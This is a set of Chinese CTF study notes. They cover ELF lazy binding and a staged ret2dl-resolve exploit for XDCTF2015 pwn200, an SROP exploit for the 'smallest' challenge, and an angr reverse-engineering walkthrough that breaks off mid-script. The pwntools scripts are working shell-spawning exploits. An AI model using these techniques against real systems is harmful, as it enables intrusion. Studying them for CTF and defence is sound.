0%

_dl_runtime_resolve

这个应该说是一个很久远的坑了,算是给自己补补基础吧,也是查漏补缺23333,也顺带复习一下延迟绑定

写了一个程序自己调试程序调用_dl_runtime_resolve的过程

1
2
3
4
5
6
7
8
#include <stdio.h>
#include <stdlib.h>

/*
 * Minimal program used to trace lazy binding: puts() is called twice so the
 * first call can be followed through the PLT resolver and the second call
 * can be compared against it.
 */
int main(void)
{
    puts("hello world");
    puts("hello world twice");
    /* exit() is declared in <stdlib.h>; without that header the call is an
     * implicit declaration, which C99 and later do not allow. */
    exit(0);
    return 0;
}

第一次调用puts

1579182750270

直接call程序的plt段,plt段是一个类似 jmp [GOT表] 的结构,第一次调用时GOT项<0x804a00c>中存放的是plt段内的地址0x08048306,如下所示

1579182851280

这个地方入栈了一个0,然后跳到0x80482f0 再入栈一个[0x804a004] (link_map)然后调用_dl_runtime_resolve函数来调用我们要用的函数

这个resolve函数一共是两个参数,这两个参数分别是一个link_map的指针和puts在ELF JMPREL Relocation Table中的偏移,示意如下

1
_dl_runtime_resolve(link_map, rel_offset)

其中ELF JMPREL Relocation Table中如下所示+0即为puts函数的偏移(64位的话就是index)

1579183036345

第一个参数&link_map如下所示,第三个数是.dynamic段的地址

1579183162193 1579183223982

主要注意观察这三个

这里介绍两个结构体

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/* One entry of the dynamic symbol table (.dynsym); each entry is 0x10 bytes. */
typedef struct// Elf32_Sym (no screenshot of the Symbol Table is included in this note)
{
Elf32_Word st_name; // dd: symbol name, as an offset from the start of .dynstr
Elf32_Addr st_value;// dd
Elf32_Word st_size; // dd
unsigned char st_info; // db: 0x12 for an imported function symbol
unsigned char st_other;// db
Elf32_Section st_shndx;// dw
} Elf32_Sym; // for an imported function symbol every other field is 0

/* One relocation entry as stored in .rel.plt. */
typedef struct// Elf32_Rel
{
Elf32_Addr r_offset; // dd: pointer into the GOT
Elf32_Word r_info; // dd
// Packed information about the imported symbol. Only the value from the second
// byte upwards matters here ((val)>>8, used as the .dynsym index); the low 0x07 byte is ignored.
} Elf32_Rel;

_dl_runtime_resolve具体步骤

  1. link_map访问.dynamic,取出.dynstr, .dynsym, .rel.plt(存放Elf32_Rel处) 的指针
  2. .rel.plt + 传入的第二个参数求出当前函数的重定位表项Elf32_Rel的指针,记作rel
  3. rel->r_info >> 8作为.dynsym的下标,求出当前函数的符号表项Elf32_Sym的指针,记作sym
  4. .dynstr + sym->st_name得出符号名字符串指针
  5. 在动态链接库查找这个函数的地址,并且把地址赋值给*rel->r_offset,即GOT表
  6. 调用这个函数

大致有这么一张图

image-20200406224128730

第二次调用puts

1579183405159

可以看到此时got表已经被改成了puts函数的地址,所以第二次是直接调用

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
// Abridged excerpt of the resolver core: l is the link_map and reloc_arg is the
// relocation offset that was pushed before jumping to the resolver.
_dl_fixup(struct link_map *l, ElfW(Word) reloc_arg)
{
// Locate the relocation entry from reloc_arg; JMPREL here is .rel.plt and reloc_offset is reloc_arg
const PLTREL *const reloc = (const void *) (D_PTR (l, l_info[DT_JMPREL]) + reloc_offset);
// Use reloc->r_info to find the matching entry in .dynsym
const ElfW(Sym) *sym = &symtab[ELFW(R_SYM) (reloc->r_info)];
// Also checks that the low byte of reloc->r_info is R_386_JUMP_SLOT (= 7)
assert (ELFW(R_TYPE)(reloc->r_info) == ELF_MACHINE_JMP_SLOT);
// strtab + sym->st_name is the symbol-name string; per the original note, result is the libc base address
result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope, version, ELF_RTYPE_CLASS_PLT, flags, NULL);
// value is the libc base plus the offset of the function being resolved, i.e. its real address
value = DL_FIXUP_MAKE_VALUE (result, sym ? (LOOKUP_VALUE_ADDRESS (result) + sym->st_value) : 0);
// Finally write value into the corresponding GOT entry
return elf_machine_fixup_plt (l, result, reloc, rel_addr, value);
}

ret2dl

这个攻击更适于一些比较简单的栈溢出的情况,但同时又难以泄露获取更多信息的情况下

可用方式:

  1. 控制程序执行dl_resolve函数
    • 给定Link_map以及index两个参数。
    • 当然我们可以直接给定 plt[0]对应的汇编代码,这时,我们就只需要一个index就足够了。
  2. 控制index的大小,以便于指向自己所控制的区域,从而伪造一个指定的重定位表项。
  3. 伪造重定位表项,使得重定位表项所指的符号也在自己可以控制的范围内。
  4. 伪造符号内容,使得符号对应的名称也在自己可以控制的范围内

XDCTF2015-pwn200

image-20200406232708454 image-20200406232720644

程序的逻辑很简单,其中最主要的是下面的read栈溢出

为了来一步步学习ret2dl,就照着师傅的博客一步步来

stage1

stage1通过栈迁移(stack pivot)来打印我们读入的字符串/bin/sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = 'pwn200' #binary's name here
context.binary = binary #context here
context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']

pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\x00'))
my_u32 = lambda x: u32(x.ljust(4, '\x00'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='', address=0):
    """Log ``what`` followed by ``address`` in hex, wrapped in ANSI colour escape codes."""
    log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

# todo here
ppp_ret = 0x0804856c
pop_ebp_ret = 0x08048453
leave_ret = 0x08048481

stack_size = 0x800
bss_addr = 0x0804A020 # readelf -S bof | grep ".bss"
base_stage = bss_addr + stack_size

read_plt=0x08048390
write_plt=0x080483C0
'''
0x08048453 : pop ebp ; ret
0x08048452 : pop ebx ; pop ebp ; ret
0x0804856c : pop ebx ; pop edi ; pop ebp ; ret
0x080485cc : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0804836c : pop ebx ; ret
0x0804856d : pop edi ; pop ebp ; ret
0x080485cd : pop esi ; pop edi ; pop ebp ; ret
0x0804834b : ret
0x08048532 : ret 0xb8
0x08048481 : leave ; ret
'''
p.recvuntil('Welcome to XDCTF2015~!\n')
payload = 'A' * 0x70
payload += p32(read_plt) # 读100个字节到base_stage 这里栈是先读再迁移
payload += p32(ppp_ret) #清除参数
payload += p32(0)
payload += p32(base_stage)
payload += p32(100)
payload += p32(pop_ebp_ret) # 把base_stage pop到ebp中
payload += p32(base_stage)
payload += p32(leave_ret) # mov esp, ebp ; pop ebp ;将esp指向base_stage
raw_input()
p.sendline(payload)

cmd = "/bin/sh"

payload2 = 'AAAA' # 接上一个payload的leave->pop ebp ; ret
payload2 += p32(write_plt)
payload2 += 'AAAA'
payload2 += p32(1)
payload2 += p32(base_stage + 80)
payload2 += p32(len(cmd))
payload2 += 'A' * (80 - len(payload2)) # pad
payload2 += cmd + '\x00'
payload2 += 'A' * (100 - len(payload2))
p.sendline(payload2)
p.interactive()

p.interactive()

stage2

这里修改了payload2,使其成为利用plt[0]+fake_index的方法来打印/bin/sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
cmd = "/bin/sh"

plt_0 = 0x08048370
index_offset = 0x20 # write's index

payload2 = 'AAAA' # for pop ebp
payload2 += p32(plt_0)
payload2 += p32(index_offset) #fake index
payload2 += 'AAAA'
payload2 += p32(1)
payload2 += p32(base_stage + 80)
payload2 += p32(len(cmd))
payload2 += 'A' * (80 - len(payload2))
payload2 += cmd + '\x00'
payload2 += 'A' * (100 - len(payload2))
p.sendline(payload2)

stage3

这次是利用一个fake Elf32_Rel,和fake offset来实现write的调用 offset就是通过fake_reloc-rel_plt的偏移计算出来的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
cmd = "/bin/sh"
plt_0 = 0x08048370
rel_plt = 0x08048318
index_offset = (base_stage + 28) - rel_plt # base_stage + 28指向fake_reloc,减去rel_plt即偏移
write_got = elf.got['write']
r_info = 0x507 # write: Elf32_Rel->r_info
fake_reloc = p32(write_got) + p32(r_info)

payload2 = 'AAAA'
payload2 += p32(plt_0)
payload2 += p32(index_offset)
payload2 += 'AAAA'
payload2 += p32(1)
payload2 += p32(base_stage + 80)
payload2 += p32(len(cmd))
payload2 += fake_reloc # (base_stage+28)的位置
payload2 += 'A' * (80 - len(payload2))
payload2 += cmd + '\x00'
payload2 += 'A' * (100 - len(payload2))
p.sendline(payload2)
p.interactive()

stage4

此时伪造了一个Elf32_Sym结构体还有fake r_info,至此我们已经可以劫持构造Elf32_Rel还有Elf32_sym了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
...
cmd = "/bin/sh"
plt_0 = 0x08048370
rel_plt = 0x08048318
index_offset = (base_stage + 28) - rel_plt
write_got = elf.got['write']
dynsym = 0x080481D8
dynstr = 0x08048268
fake_sym_addr = base_stage + 36
align = 0x10 - ((fake_sym_addr - dynsym) & 0xf) # 这里的对齐操作是因为dynsym里的Elf32_Sym结构体都是0x10字节大小
fake_sym_addr = fake_sym_addr + align
index_dynsym = (fake_sym_addr - dynsym) / 0x10 # 除以0x10因为Elf32_Sym结构体的大小为0x10,得到write的dynsym索引号
r_info = (index_dynsym << 8) | 0x7
fake_reloc = p32(write_got) + p32(r_info)
st_name = 0x54
fake_sym = p32(st_name) + p32(0) + p32(0) + p32(0x12)

payload2 = 'AAAA'
payload2 += p32(plt_0)
payload2 += p32(index_offset)
payload2 += 'AAAA'
payload2 += p32(1)
payload2 += p32(base_stage + 80)
payload2 += p32(len(cmd))
payload2 += fake_reloc # (base_stage+28)的位置
payload2 += 'B' * align #算出要对齐的字节数
payload2 += fake_sym # (base_stage+36)的位置
payload2 += 'A' * (80 - len(payload2))
payload2 += cmd + '\x00'
payload2 += 'A' * (100 - len(payload2))
p.sendline(payload2)
p.interactive()

stage5

前面我们写了st_name = 0x54,指向的是string table中的write字符串

然后我们把他修改成我们输入的write字符串

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# Stage 5: same forged Elf32_Rel / Elf32_Sym as the previous stage, but st_name
# now points at a "write\x00" string placed in our own buffer instead of .dynstr.
cmd = "/bin/sh"
plt_0 = 0x08048370
rel_plt = 0x08048318
index_offset = (base_stage + 28) - rel_plt  # base_stage + 28 holds fake_reloc; subtracting rel_plt gives the offset
write_got = elf.got['write']
dynsym = 0x080481D8
dynstr = 0x08048268
fake_sym_addr = base_stage + 36
# Elf32_Sym entries are 0x10 bytes each, so the fake entry must sit at a
# multiple of 0x10 from dynsym for the index computed below to be exact.
align = 0x10 - ((fake_sym_addr - dynsym) & 0xf)
fake_sym_addr = fake_sym_addr + align
# Floor division keeps the index an int (a plain "/" yields a float on Python 3,
# which would break the shift below).
index_dynsym = (fake_sym_addr - dynsym) // 0x10
r_info = (index_dynsym << 8) | 0x7
fake_reloc = p32(write_got) + p32(r_info)
st_name = (fake_sym_addr + 0x10) - dynstr  # the name string sits right after the 0x10-byte fake Elf32_Sym
fake_sym = p32(st_name) + p32(0) + p32(0) + p32(0x12)

payload2 = 'AAAA'
payload2 += p32(plt_0)
payload2 += p32(index_offset)
payload2 += 'AAAA'
payload2 += p32(1)
payload2 += p32(base_stage + 80)
payload2 += p32(len(cmd))
payload2 += fake_reloc  # located at base_stage + 28
payload2 += 'B' * align
payload2 += fake_sym  # located at base_stage + 36 + align
payload2 += "write\x00"
payload2 += 'A' * (80 - len(payload2))
payload2 += cmd + '\x00'
payload2 += 'A' * (100 - len(payload2))
# The process handle is `p` throughout this exploit; `r` was never defined here.
p.sendline(payload2)
p.interactive()

stage6

上一步我们用输入的write实现了调用,这一步直接改成system不就是getshell了吗

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# Stage 6: same layout as stage 5, but the forged symbol name is "system" and
# its single argument is the address of the "/bin/sh" string in the buffer.
# NOTE(review): plt_0, rel_plt and dynstr below differ from the values used in
# stages 3-5 (0x08048370, 0x08048318, 0x08048268) - confirm them against the
# binary actually being attacked.
cmd = "/bin/sh"
plt_0 = 0x08048380
rel_plt = 0x08048330
index_offset = (base_stage + 28) - rel_plt
write_got = elf.got['write']
dynsym = 0x080481d8
dynstr = 0x08048278
fake_sym_addr = base_stage + 36
align = 0x10 - ((fake_sym_addr - dynsym) & 0xf)
fake_sym_addr = fake_sym_addr + align
index_dynsym = (fake_sym_addr - dynsym) / 0x10
r_info = (index_dynsym << 8) | 0x7
fake_reloc = p32(write_got) + p32(r_info)
st_name = (fake_sym_addr + 0x10) - dynstr
fake_sym = p32(st_name) + p32(0) + p32(0) + p32(0x12)

payload2 = 'AAAA'
payload2 += p32(plt_0)
payload2 += p32(index_offset)
payload2 += 'AAAA'
# First argument of the resolved function: address of cmd, which is placed at base_stage + 80 below.
payload2 += p32(base_stage + 80)
payload2 += 'aaaa'
payload2 += 'aaaa'
payload2 += fake_reloc # located at base_stage+28
payload2 += 'B' * align
payload2 += fake_sym # located at base_stage+36 plus the alignment padding
payload2 += "system\x00"
payload2 += 'A' * (80 - len(payload2))
payload2 += cmd + '\x00'
payload2 += 'A' * (100 - len(payload2))
p.sendline(payload2)
p.interactive()

模板

这里使用到了roputils

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from roputils import *
from pwn import process
from pwn import gdb
from pwn import context
r = process('./pwn200')
context.log_level = 'debug'

rop = ROP('./pwn200')
offset = 112
bss_base = rop.section('.bss')
buf = rop.fill(offset)

buf += rop.call('read', 0, bss_base, 100) #返回地址处自动加上了有ppp_ret的地址
## used to call dl_Resolve()
buf += rop.dl_resolve_call(bss_base + 20, bss_base) # dl_resolve_call第一个参数是Elf32_Rel的base,用来填上fake Rel结构体偏移的 第二个是*args,执行dl_resolve_call时函数的参数
r.send(buf)

buf = rop.string('/bin/sh') # /bin/sh是system参数
buf += rop.fill(20, buf)
## used to make faking data, such relocation, Symbol, Str
buf += rop.dl_resolve_data(bss_base + 20, 'system') # 这里同时填上了Elf32_Rel结构体和Elf32_sym结构体(base+20对应前面的base+20,注意)
buf += rop.fill(100, buf)
r.send(buf)
r.interactive()

不过在布置base的时候需要注意一下bss的内容还有一些对齐操作,必要时调试观察+修改一下base


参考链接:

https://bbs.pediy.com/thread-227034.htm

https://wiki.x10sec.org/pwn/stackoverflow/advanced_rop/

64位参考链接:https://xz.aliyun.com/t/5722#toc-2

高级栈溢出——SROP

查漏补缺233333

SROP

Sigreturn Oriented Programming

其中,Unix-like 系统处理信号(signal)的机制主要分为如下几个步骤:

当内核向某个进程发起(deliver)一个signal,该进程会被暂时挂起(suspend),进入内核(1)
然后内核为该进程保存相应的上下文,跳转到之前注册好的signal handler中处理相应signal(2)
当signal handler返回之后(3)
内核为该进程恢复之前保存的上下文,最后恢复进程的执行(4)

ucontext

伪造时需要注意:esp、ebp 以及 es、gs 等段寄存器不可直接设置为0

保存上下文时保存的内容叫ucontext,具体对应如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
/* Saved signal context for 32-bit x86: the fields appear in the order shown
 * here, so a forged frame must follow the same order. */
struct sigcontext	//x86
{
/* Segment registers, each stored as a 16-bit value followed by a 16-bit filler. */
unsigned short gs, __gsh;
unsigned short fs, __fsh;
unsigned short es, __esh;
unsigned short ds, __dsh;
/* General-purpose registers. */
unsigned long edi;
unsigned long esi;
unsigned long ebp;
unsigned long esp;
unsigned long ebx;
unsigned long edx;
unsigned long ecx;
unsigned long eax;
unsigned long trapno;
unsigned long err;
unsigned long eip;
unsigned short cs, __csh;
unsigned long eflags;
unsigned long esp_at_signal;
unsigned short ss, __ssh;
struct _fpstate * fpstate;
unsigned long oldmask;
unsigned long cr2;
};

////////////////////////////////////////////////
/* Floating-point state for x86-64; the 64-bit sigcontext refers to it through
 * its fpstate pointer. */
struct _fpstate //x64
{
/* FPU environment matching the 64-bit FXSAVE layout. */
__uint16_t cwd;
__uint16_t swd;
__uint16_t ftw;
__uint16_t fop;
__uint64_t rip;
__uint64_t rdp;
__uint32_t mxcsr;
__uint32_t mxcr_mask;
struct _fpxreg _st[8];
struct _xmmreg _xmm[16];
__uint32_t padding[24];
};

/* Saved signal context for x86-64. The SROP exploit later in this note fills
 * in rax, rdi, rsi, rdx, rsp and rip of a forged copy of this layout. */
struct sigcontext
{
__uint64_t r8;
__uint64_t r9;
__uint64_t r10;
__uint64_t r11;
__uint64_t r12;
__uint64_t r13;
__uint64_t r14;
__uint64_t r15;
__uint64_t rdi;
__uint64_t rsi;
__uint64_t rbp;
__uint64_t rbx;
__uint64_t rdx;
__uint64_t rax;
__uint64_t rcx;
__uint64_t rsp;
__uint64_t rip;
__uint64_t eflags;
unsigned short cs;
unsigned short gs;
unsigned short fs;
unsigned short __pad0;
__uint64_t err;
__uint64_t trapno;
__uint64_t oldmask;
__uint64_t cr2;
/* The fpstate pointer and a plain 64-bit word share the same storage. */
__extension__ union
{
struct _fpstate * fpstate;
__uint64_t __fpstate_word;
};
__uint64_t __reserved1 [8];
};

syscall

具体利用时需要的是调用sigreturn系统调用

1
2
3
4
5
6
/*for x86*/
mov eax,0x77
int 80h
/*for x86_64*/
mov rax,0xf
syscall

利用原理:

  • Signal Frame 被保存在用户的地址空间中,所以用户是可以读写的。
  • 由于内核与信号处理程序无关 (kernel agnostic about signal handlers),它并不会去记录这个 signal 对应的 Signal Frame,所以当执行 sigreturn 系统调用时,此时的 Signal Frame 并不一定是之前内核为用户进程保存的 Signal Frame。

比如当我们执行sigreturn系统调用之前栈布局是如下情况的话,当系统执行完 sigreturn 系统调用之后,会执行一系列的 pop 指令以便于恢复相应寄存器的值,当执行到 rip 时,就会将程序执行流指向 syscall 地址,根据相应寄存器的值,此时,便会得到一个 shell

image-20200406192003998

链式利用原理:

  • 控制栈指针。
  • 把原来 rip 指向的syscall gadget 换成syscall; ret gadget。

如下图所示 ,这样当每次 syscall 返回的时候,栈指针都会指向下一个 Signal Frame。因此就可以执行一系列的 sigreturn 函数调用

image-20200406192224800

利用条件

  1. 程序存在栈溢出漏洞
  2. 知道栈地址或者可以知道需要使用字符串的地址等
  3. 知道sigreturn的地址
  4. 知道syscall的地址或者syscall gadget地址

smallest

原理看上去挺好理解,还是直接实操吧

image-20200406194252445

程序没有canary和PIE保护

具体的程序就这么几行汇编代码:

1
2
3
4
5
6
xor     rax, rax
mov edx, 400h ; count
mov rsi, rsp ; buf
mov rdi, rax ; fd
syscall ; LINUX - sys_read
retn

然后加载进程序的时候只有这么几个寄存器被操作了,其余值均为0(Ubuntu16.04)

直接从rsp处读取了0x400个字节的栈内容,其中最主要还是需要知道怎么来构造出sigreturn的syscall操作

这里通过一个exp来学习一下:

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = 'smallest' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\x00'))
my_u32 = lambda x: u32(x.ljust(4, '\x00'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='', address=0):
    """Log ``what`` followed by ``address`` in hex, wrapped in ANSI colour escape codes."""
    log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

# todo here
syscall_ret = 0x00000000004000BE
start_addr = 0x00000000004000B0

# Queue the entry point three times so the program runs its read() again after each ret.
payload = p64(start_addr) * 3
p.send(payload)

# Overwrite only the low byte of the next return address so execution resumes
# at start_addr + 3, skipping `xor rax, rax`. This read() returned 1, so rax is
# still 1 and the following syscall becomes write(1, rsp, 0x400), leaking stack
# contents.
p.send('\xb3')
stack_addr = u64(p.recv()[8:16])
log.success('leak stack addr :' + hex(stack_addr))

# First frame: read(0, stack_addr, 0x400) with rsp pivoted to stack_addr.
# Moving the stack to the leaked address means everything written afterwards
# (including "/bin/sh") lives at a known location.
sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_read  # syscall number taken from pwntools' constants
sigframe.rdi = 0
sigframe.rsi = stack_addr
sigframe.rdx = 0x400
sigframe.rsp = stack_addr
sigframe.rip = syscall_ret
# Lay the frame down first, then return to start so the program reads once more.
payload = p64(start_addr) + 'a' * 8 + str(sigframe)
p.send(payload)

# Trigger sigreturn: this 15-byte write replaces the 'a' * 8 slot (the next
# return address) with syscall_ret, and because read() returns the byte count,
# rax becomes 15 - the sigreturn syscall number. The seven 'b' bytes exist only
# to bring the length to 15.
sigreturn = p64(syscall_ret) + 'b' * 7
# After sigreturn the forged frame takes effect: read(0, stack_addr, 0x400).
p.send(sigreturn)

# Second frame: execve("/bin/sh", 0, 0).
sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_execve
sigframe.rdi = stack_addr + 0x120  # address of the "/bin/sh" string appended below
sigframe.rsi = 0x0
sigframe.rdx = 0x0
sigframe.rsp = stack_addr
sigframe.rip = syscall_ret

frame_payload = p64(start_addr) + 'b' * 8 + str(sigframe)
# print_function is imported at the top of this script, so print must be called as a function.
print(len(frame_payload))
# Pad to offset 0x120 so the string lands exactly where rdi points.
payload = frame_payload + (0x120 - len(frame_payload)) * '\x00' + '/bin/sh\x00'
# The process handle is `p`; the original `sh` was never defined in this script.
p.send(payload)
p.send(sigreturn)
p.interactive()

参考链接:

https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/advanced-rop-zh/#srop

http://www.reshahar.com/2017/05/04/360%E6%98%A5%E7%A7%8B%E6%9D%AFsmallest-pwn%E7%9A%84%E5%AD%A6%E4%B9%A0%E4%B8%8E%E5%88%A9%E7%94%A8/

https://www.anquanke.com/post/id/85810

https://www.freebuf.com/articles/network/87447.html

自己学校新生杯一道逆向题引导的angr学习

前言

上学期在图书馆研究室偶然提到了自己协会办比赛可以给学弟学妹们拿学分的想法,我当时的想法是办可以办,就是题目可能得非常简单他们才能写,嘛不过事实确实是这样。可是有外校师傅一起加入之后就变的很活跃了,室友请了启奡师傅还有福州大学的师傅来出题,自己也在二进制方向放了一波签到题,举行了一次面向大一大二的新生杯,也拉了一些外校的师傅来打,整体办的还是蛮成功的,室友看上去也挺开心,这里专门用启奡师傅给的逆向来记一篇一直没有接触的angr的学习

题目

看来以后写博客得把题目链接也给上了,所以去github新建了一个用来放题目的仓库,题目链接

拿到题目之后首先用IDA脚本去花指令,这里用的是IDApython

1
2
3
4
5
6
7
8
9
10
11
ads = 0x4005B0

end = 0x401DC0

codes = get_bytes(ads, end-ads)

codes = codes.replace("\x74\x03\x75\x01\xe8\x90", "\x90\x90\x90\x90\x90\x90")

patch_bytes(ads, codes)

print "[+] patch ok"

得到函数之后可以发现是一个很长的线性执行流程,直接手动把整个流程一步步过肯定很麻烦了,当然要自己写脚本来简化

1585656430766

出题人wp写的思路是:

  1. 简单花指令的去除
  2. 在有限域上运算的简化

ps:在逆向的时候突然发现原来IDA可以按=映射变量,噗,我尼玛玩了这么久的IDA居然才知道

第一种解法:IDApython

其中一种解题方法是用IDApython来解,这里也学习了一些IDApython脚本的用法,具体脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
def trans(xx, kk):
    """Undo a byte-wise ``add kk``: subtract kk from every element, modulo 256."""
    return [(x - kk) & 0xFF for x in xx]


def xor(xx, kk):
    """XOR every element with kk (XOR is its own inverse)."""
    return [x ^ kk for x in xx]


def not_(xx):
    """Bitwise-NOT every element, keeping each result in the 0..255 byte range."""
    # Python's ~x equals -x-1, so mask to one byte; otherwise the list fills
    # with negative numbers instead of byte values.
    return [~x & 0xFF for x in xx]

dt = [0xd9, 0x2c, 0x27, 0xd6, 0xd8, 0x2a, 0xda, 0x2d, 0xd7, 0x2c, 0xdc, 0xe1, 0xdb, 0x2c, 0xd9, 0xdd, 0x27, 0x2d, 0x2a, 0xdc, 0xdb, 0x2c, 0xe1, 0x29, 0xda, 0xda, 0x2c, 0xda, 0x2a, 0xd9, 0x29, 0x2a]

ads = 0x4005B0
end = 0x401DC0
target = 'byte ptr [rdx+rax+5]'  # destination operand of every instruction we care about

# Walk the instructions backwards from `end`, applying the inverse of each
# xor / add / not on the target operand to the expected bytes in dt.
i = PrevHead(end)
while i > ads:
    if GetOpnd(i, 0) == target:
        mnem = GetMnem(i)
        if mnem == 'xor':
            k = int(GetOpnd(i, 1).rstrip('h'), 16)
            dt = xor(dt, k)
            print("xor: {}".format(k))
        elif mnem == 'add':
            k = int(GetOpnd(i, 1).rstrip('h'), 16)
            dt = trans(dt, k)
            print("trans: {}".format(k))
        elif mnem == 'not':
            dt = not_(dt)
            # `not` has no immediate operand, so there is no k to report; the
            # original printed a stale (or not yet defined) k here.
            print("not")
    i = PrevHead(i)

# Normalise to byte values before printing in case an intermediate step left a negative int.
print([b & 0xFF for b in dt])

第二种解法:angr

当然我这篇文章主要要说的就是第二种解法了:angr求解

What is angr

首先angr是一个什么东西呢

angr is a suite of Python 3 libraries that let you load a binary and do a lot of cool things to it:

(angr是一套用来加载二进制文件、并对它做很多很酷的事情的Python 3库)

具体可以用来做以下的一些事(虽然不知道大佬们把这些翻译成什么中文了,大致看看先)

  • Disassembly and intermediate-representation lifting
  • Program instrumentation
  • Symbolic execution
  • Control-flow analysis
  • Data-dependency analysis
  • Value-set analysis (VSA)
  • Decompilation

在使用之前强烈建议多了解一下符号执行的概念,要不然官方文档中很多英文还有概念可能会看不懂,特别是那些带数学符号的概念名词,不过细心一点看不会很难懂的。但是毕竟有些词语有些学术化,我也懒得用那么多俗语来解释了,下文只在一些重要地方做一些注释

例如:这篇文章

安装

安装环境:Ubuntu16.04

  1. 安装之前首先把自己默认的python3.5换成了python 3.7.1(编译安装)
  2. sudo apt-get install python3-dev libffi-dev build-essential virtualenvwrapper
  3. mkvirtualenv --python=$(which python3) angr && pip install angr

其中virtualenvwrapper是一个Python虚拟环境,使用虚拟环境的主要原因是angr会修改libz3和libVEX

创建虚拟环境之后,每次使用 workon angr 进入虚拟环境、使用 deactivate 退出,即可在真实环境与虚拟环境之间切换

使用&examples

这里用一个简单的例子来开始直接上手学习angr吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
char *sneaky = "SOSNEAKY";

/*
 * Check a username/password pair.
 * Returns 1 when password equals the hard-coded string `sneaky`, or when it
 * equals the first 8 bytes read from the file named by username; returns 0
 * otherwise.
 */
int authenticate(char *username, char *password)
{
char stored_pw[9];
stored_pw[8] = 0;
int pwfile;

// evil back d00r
if (strcmp(password, sneaky) == 0) return 1;

// NOTE(review): the results of open() and read() are not checked, so if either
// fails stored_pw[0..7] is never written before the comparison below.
pwfile = open(username, O_RDONLY);
read(pwfile, stored_pw, 8);

if (strcmp(password, stored_pw) == 0) return 1;
return 0;

}

/* Print the welcome banner. Declared int but has no return statement. */
int accepted()
{
printf("Welcome to the admin console, trusted user!\n");
}

int rejected()
{
printf("Go away!");
exit(1);
}

/*
 * Prompt for a username and a password on stdin (8 bytes each), then call
 * accepted() or rejected() depending on the result of authenticate().
 */
int main(int argc, char **argv)
{
char username[9];
char password[9];
int authed;

// Terminate both buffers up front; the reads below fill at most 8 bytes each.
username[8] = 0;
password[8] = 0;

printf("Username: \n");
read(0, username, 8);
// One extra byte is read into authed after each field - presumably to consume
// the trailing newline; authed is overwritten by authenticate() below.
read(0, &authed, 1);
printf("Password: \n");
read(0, password, 8);
read(0, &authed, 1);

authed = authenticate(username, password);
if (authed) accepted();
else rejected();
}

这里程序给出了一个很简单的逻辑,具体是我们只要输入password"SOSNEAKY"就可以直接认证通过

然后这里是angr官网给出的solve.py,我在其中注释处做了一些补充笔记

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
#!/usr/bin/env python

import angr
import sys

# Look at fauxware.c! This is the source code for a "faux firmware" (@zardus
# really likes the puns) that's meant to be a simple representation of a
# firmware that can authenticate users but also has a backdoor - the backdoor
# is that anybody who provides the string "SOSNEAKY" as their password will be
# automatically authenticated.

def basic_symbolic_execution():
# We can use this as a basic demonstration of using angr for symbolic
# execution. First, we load the binary into an angr project.
# 这里先展示了一个很基础的符号执行,首先把对应的binary文件名填进一个angr Project
